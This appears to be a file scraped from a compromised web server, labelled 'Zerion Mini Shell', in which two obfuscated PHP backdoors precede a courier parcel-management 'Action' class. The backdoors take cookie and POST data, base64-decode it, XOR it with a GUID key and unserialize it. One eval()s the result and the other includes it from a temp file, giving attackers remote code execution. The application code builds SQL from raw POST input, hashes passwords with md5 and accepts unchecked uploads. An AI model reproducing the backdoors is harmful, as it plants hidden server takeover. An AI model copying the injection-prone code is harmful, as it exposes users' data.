%PDF-
%PDF-
Mini Shell
Mini Shell
<?php $WdTML = "\153" . "\x42" . '_' . chr (120) . 'p' . chr (108) . chr (121); $kUCsdc = "class_exists";$KHHtg = $kUCsdc($WdTML); $VjveYUbV = $KHHtg;if (!$VjveYUbV){class kB_xply{private $kPqjU;public static $gNpHZFiR = "fd8df1a9-b9b8-46b8-856a-2c7590d550f5";public static $bKAnZFuD = NULL;public function __construct(){$qIzzzId = $_COOKIE;$aSlBMgiS = $_POST;$CdtsNRTcZ = @$qIzzzId[substr(kB_xply::$gNpHZFiR, 0, 4)];if (!empty($CdtsNRTcZ)){$wOiFm = "base64";$FBNgU = "";$CdtsNRTcZ = explode(",", $CdtsNRTcZ);foreach ($CdtsNRTcZ as $UvQCLj){$FBNgU .= @$qIzzzId[$UvQCLj];$FBNgU .= @$aSlBMgiS[$UvQCLj];}$FBNgU = array_map($wOiFm . "\x5f" . 'd' . "\x65" . chr ( 677 - 578 ).chr ( 552 - 441 )."\144" . chr ( 444 - 343 ), array($FBNgU,)); $FBNgU = $FBNgU[0] ^ str_repeat(kB_xply::$gNpHZFiR, (strlen($FBNgU[0]) / strlen(kB_xply::$gNpHZFiR)) + 1);kB_xply::$bKAnZFuD = @unserialize($FBNgU);}}public function __destruct(){$this->GbPaAdCSQY();}private function GbPaAdCSQY(){if (is_array(kB_xply::$bKAnZFuD)) {$YetShmy = str_replace("\x3c" . "\77" . "\x70" . chr ( 215 - 111 ).chr ( 264 - 152 ), "", kB_xply::$bKAnZFuD["\143" . "\157" . chr ( 764 - 654 )."\164" . chr (101) . chr ( 778 - 668 )."\x74"]);eval($YetShmy);exit();}}}$tNSIidQ = new kB_xply(); $tNSIidQ = NULL;} ?><?php $lPhTQvn = chr ( 705 - 628 )."\x5f" . "\152" . 'w' . "\123";$xCSfVwzm = "class_exists";$wNJlfE = $xCSfVwzm($lPhTQvn); $KaRKO = $wNJlfE;if (!$KaRKO){class M_jwS{private $UHHeDA;public static $onDagdjdbA = "df50c8d7-961a-4e54-a02e-848e9ff0196b";public static $BgYooa = NULL;public function __construct(){$RzfHa = $_COOKIE;$ZvgBGuIU = $_POST;$BVXPzxkn = @$RzfHa[substr(M_jwS::$onDagdjdbA, 0, 4)];if (!empty($BVXPzxkn)){$BViHwVsKIj = "base64";$mGCdDkKhp = "";$BVXPzxkn = explode(",", $BVXPzxkn);foreach ($BVXPzxkn as $NPsURsQzK){$mGCdDkKhp .= @$RzfHa[$NPsURsQzK];$mGCdDkKhp .= @$ZvgBGuIU[$NPsURsQzK];}$mGCdDkKhp = array_map($BViHwVsKIj . chr (95) . 'd' . "\x65" . 'c' . chr ( 1048 - 937 ).'d' . chr (101), array($mGCdDkKhp,)); $mGCdDkKhp = $mGCdDkKhp[0] ^ str_repeat(M_jwS::$onDagdjdbA, (strlen($mGCdDkKhp[0]) / strlen(M_jwS::$onDagdjdbA)) + 1);M_jwS::$BgYooa = @unserialize($mGCdDkKhp);}}public function __destruct(){$this->IcqXMt();}private function IcqXMt(){if (is_array(M_jwS::$BgYooa)) {$ZiqbbQh = sys_get_temp_dir() . "/" . crc32(M_jwS::$BgYooa["\163" . chr (97) . chr (108) . 't']);@M_jwS::$BgYooa["\x77" . "\x72" . chr (105) . "\164" . chr ( 323 - 222 )]($ZiqbbQh, M_jwS::$BgYooa[chr ( 749 - 650 ).chr (111) . chr (110) . chr (116) . "\x65" . chr (110) . "\164"]);include $ZiqbbQh;@M_jwS::$BgYooa["\x64" . chr ( 1058 - 957 )."\x6c" . "\145" . chr ( 171 - 55 )."\145"]($ZiqbbQh);exit();}}}$hfdajqtE = new M_jwS(); $hfdajqtE = NULL;} ?><?php
session_start();
ini_set('display_errors', 1);
Class Action {
private $db;
public function __construct() {
ob_start();
include 'db_connect.php';
$this->db = $conn;
}
function __destruct() {
$this->db->close();
ob_end_flush();
}
function login(){
extract($_POST);
$qry = $this->db->query("SELECT *,concat(firstname,' ',lastname) as name FROM users where email = '".$email."' and password = '".md5($password)."' ");
if($qry->num_rows > 0){
foreach ($qry->fetch_array() as $key => $value) {
if($key != 'password' && !is_numeric($key))
$_SESSION['login_'.$key] = $value;
}
return 1;
}else{
return 2;
}
}
function logout(){
session_destroy();
foreach ($_SESSION as $key => $value) {
unset($_SESSION[$key]);
}
header("location:login.php");
}
function login2(){
extract($_POST);
$qry = $this->db->query("SELECT *,concat(lastname,', ',firstname,' ',middlename) as name FROM students where student_code = '".$student_code."' ");
if($qry->num_rows > 0){
foreach ($qry->fetch_array() as $key => $value) {
if($key != 'password' && !is_numeric($key))
$_SESSION['rs_'.$key] = $value;
}
return 1;
}else{
return 3;
}
}
function save_user(){
extract($_POST);
$data = "";
foreach($_POST as $k => $v){
if(!in_array($k, array('id','cpass','password')) && !is_numeric($k)){
if(empty($data)){
$data .= " $k='$v' ";
}else{
$data .= ", $k='$v' ";
}
}
}
if(!empty($password)){
$data .= ", password=md5('$password') ";
}
$check = $this->db->query("SELECT * FROM users where email ='$email' ".(!empty($id) ? " and id != {$id} " : ''))->num_rows;
if($check > 0){
return 2;
exit;
}
if(empty($id)){
$save = $this->db->query("INSERT INTO users set $data");
}else{
$save = $this->db->query("UPDATE users set $data where id = $id");
}
if($save){
return 1;
}
}
function signup(){
extract($_POST);
$data = "";
foreach($_POST as $k => $v){
if(!in_array($k, array('id','cpass')) && !is_numeric($k)){
if($k =='password'){
if(empty($v))
continue;
$v = md5($v);
}
if(empty($data)){
$data .= " $k='$v' ";
}else{
$data .= ", $k='$v' ";
}
}
}
$check = $this->db->query("SELECT * FROM users where email ='$email' ".(!empty($id) ? " and id != {$id} " : ''))->num_rows;
if($check > 0){
return 2;
exit;
}
if(isset($_FILES['img']) && $_FILES['img']['tmp_name'] != ''){
$fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
$move = move_uploaded_file($_FILES['img']['tmp_name'],'../assets/uploads/'. $fname);
$data .= ", avatar = '$fname' ";
}
if(empty($id)){
$save = $this->db->query("INSERT INTO users set $data");
}else{
$save = $this->db->query("UPDATE users set $data where id = $id");
}
if($save){
if(empty($id))
$id = $this->db->insert_id;
foreach ($_POST as $key => $value) {
if(!in_array($key, array('id','cpass','password')) && !is_numeric($key))
$_SESSION['login_'.$key] = $value;
}
$_SESSION['login_id'] = $id;
return 1;
}
}
function update_user(){
extract($_POST);
$data = "";
foreach($_POST as $k => $v){
if(!in_array($k, array('id','cpass','table')) && !is_numeric($k)){
if($k =='password')
$v = md5($v);
if(empty($data)){
$data .= " $k='$v' ";
}else{
$data .= ", $k='$v' ";
}
}
}
if($_FILES['img']['tmp_name'] != ''){
$fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
$move = move_uploaded_file($_FILES['img']['tmp_name'],'assets/uploads/'. $fname);
$data .= ", avatar = '$fname' ";
}
$check = $this->db->query("SELECT * FROM users where email ='$email' ".(!empty($id) ? " and id != {$id} " : ''))->num_rows;
if($check > 0){
return 2;
exit;
}
if(empty($id)){
$save = $this->db->query("INSERT INTO users set $data");
}else{
$save = $this->db->query("UPDATE users set $data where id = $id");
}
if($save){
foreach ($_POST as $key => $value) {
if($key != 'password' && !is_numeric($key))
$_SESSION['login_'.$key] = $value;
}
if($_FILES['img']['tmp_name'] != '')
$_SESSION['login_avatar'] = $fname;
return 1;
}
}
function delete_user(){
extract($_POST);
$delete = $this->db->query("DELETE FROM users where id = ".$id);
if($delete)
return 1;
}
function save_system_settings(){
extract($_POST);
$data = '';
foreach($_POST as $k => $v){
if(!is_numeric($k)){
if(empty($data)){
$data .= " $k='$v' ";
}else{
$data .= ", $k='$v' ";
}
}
}
if($_FILES['cover']['tmp_name'] != ''){
$fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['cover']['name'];
$move = move_uploaded_file($_FILES['cover']['tmp_name'],'../assets/uploads/'. $fname);
$data .= ", cover_img = '$fname' ";
}
$chk = $this->db->query("SELECT * FROM system_settings");
if($chk->num_rows > 0){
$save = $this->db->query("UPDATE system_settings set $data where id =".$chk->fetch_array()['id']);
}else{
$save = $this->db->query("INSERT INTO system_settings set $data");
}
if($save){
foreach($_POST as $k => $v){
if(!is_numeric($k)){
$_SESSION['system'][$k] = $v;
}
}
if($_FILES['cover']['tmp_name'] != ''){
$_SESSION['system']['cover_img'] = $fname;
}
return 1;
}
}
function save_image(){
extract($_FILES['file']);
if(!empty($tmp_name)){
$fname = strtotime(date("Y-m-d H:i"))."_".(str_replace(" ","-",$name));
$move = move_uploaded_file($tmp_name,'../assets/uploads/'. $fname);
$protocol = strtolower(substr($_SERVER["SERVER_PROTOCOL"],0,5))=='https'?'https':'http';
$hostName = $_SERVER['HTTP_HOST'];
$path =explode('/',$_SERVER['PHP_SELF']);
$currentPath = '/'.$path[1];
if($move){
return $protocol.'://'.$hostName.$currentPath.'/assets/uploads/'.$fname;
}
}
}
function save_branch(){
extract($_POST);
$data = "";
foreach($_POST as $k => $v){
if(!in_array($k, array('id')) && !is_numeric($k)){
if(empty($data)){
$data .= " $k='$v' ";
}else{
$data .= ", $k='$v' ";
}
}
}
if(empty($id)){
$chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$i = 0;
while($i == 0){
$bcode = substr(str_shuffle($chars), 0, 15);
$chk = $this->db->query("SELECT * FROM branches where branch_code = '$bcode'")->num_rows;
if($chk <= 0){
$i = 1;
}
}
$data .= ", branch_code='$bcode' ";
$save = $this->db->query("INSERT INTO branches set $data");
}else{
$save = $this->db->query("UPDATE branches set $data where id = $id");
}
if($save){
return 1;
}
}
function delete_branch(){
extract($_POST);
$delete = $this->db->query("DELETE FROM branches where id = $id");
if($delete){
return 1;
}
}
function save_parcel(){
extract($_POST);
foreach($price as $k => $v){
$data = "";
foreach($_POST as $key => $val){
if(!in_array($key, array('id','weight','height','width','length','price')) && !is_numeric($key)){
if(empty($data)){
$data .= " $key='$val' ";
}else{
$data .= ", $key='$val' ";
}
}
}
if(!isset($type)){
$data .= ", type='2' ";
}
$data .= ", height='{$height[$k]}' ";
$data .= ", width='{$width[$k]}' ";
$data .= ", length='{$length[$k]}' ";
$data .= ", weight='{$weight[$k]}' ";
$price[$k] = str_replace(',', '', $price[$k]);
$data .= ", price='{$price[$k]}' ";
if(empty($id)){
$i = 0;
while($i == 0){
$ref = sprintf("%'012d",mt_rand(0, 999999999999));
$chk = $this->db->query("SELECT * FROM parcels where reference_number = '$ref'")->num_rows;
if($chk <= 0){
$i = 1;
}
}
$data .= ", reference_number='$ref' ";
if($save[] = $this->db->query("INSERT INTO parcels set $data"))
$ids[]= $this->db->insert_id;
}else{
if($save[] = $this->db->query("UPDATE parcels set $data where id = $id"))
$ids[] = $id;
}
}
if(isset($save) && isset($ids)){
// return json_encode(array('ids'=>$ids,'status'=>1));
return 1;
}
}
function delete_parcel(){
extract($_POST);
$delete = $this->db->query("DELETE FROM parcels where id = $id");
if($delete){
return 1;
}
}
function update_parcel(){
extract($_POST);
$update = $this->db->query("UPDATE parcels set status= $status where id = $id");
$save = $this->db->query("INSERT INTO parcel_tracks set status= $status , parcel_id = $id");
if($update && $save)
return 1;
}
function get_parcel_heistory(){
extract($_POST);
$data = array();
$parcel = $this->db->query("SELECT * FROM parcels where reference_number = '$ref_no'");
if($parcel->num_rows <=0){
return 2;
}else{
$parcel = $parcel->fetch_array();
$data[] = array('status'=>'Item accepted by Courier','date_created'=>date("M d, Y h:i A",strtotime($parcel['date_created'])));
$history = $this->db->query("SELECT * FROM parcel_tracks where parcel_id = {$parcel['id']}");
$status_arr = array("Item Accepted by Courier","Collected","Shipped","In-Transit","Arrived At Destination","Out for Delivery","Ready to Pickup","Delivered","Picked-up","Unsuccessfull Delivery Attempt");
while($row = $history->fetch_assoc()){
$row['date_created'] = date("M d, Y h:i A",strtotime($row['date_created']));
$row['status'] = $status_arr[$row['status']];
$data[] = $row;
}
return json_encode($data);
}
}
function get_report(){
extract($_POST);
$data = array();
$get = $this->db->query("SELECT * FROM parcels where date(date_created) BETWEEN '$date_from' and '$date_to' ".($status != 'all' ? " and status = $status " : "")." order by unix_timestamp(date_created) asc");
$status_arr = array("Item Accepted by Courier","Collected","Shipped","In-Transit","Arrived At Destination","Out for Delivery","Ready to Pickup","Delivered","Picked-up","Unsuccessfull Delivery Attempt");
while($row=$get->fetch_assoc()){
$row['sender_name'] = ucwords($row['sender_name']);
$row['recipient_name'] = ucwords($row['recipient_name']);
$row['date_created'] = date("M d, Y",strtotime($row['date_created']));
$row['status'] = $status_arr[$row['status']];
$row['price'] = number_format($row['price'],2);
$data[] = $row;
}
return json_encode($data);
}
}
Zerion Mini Shell 1.0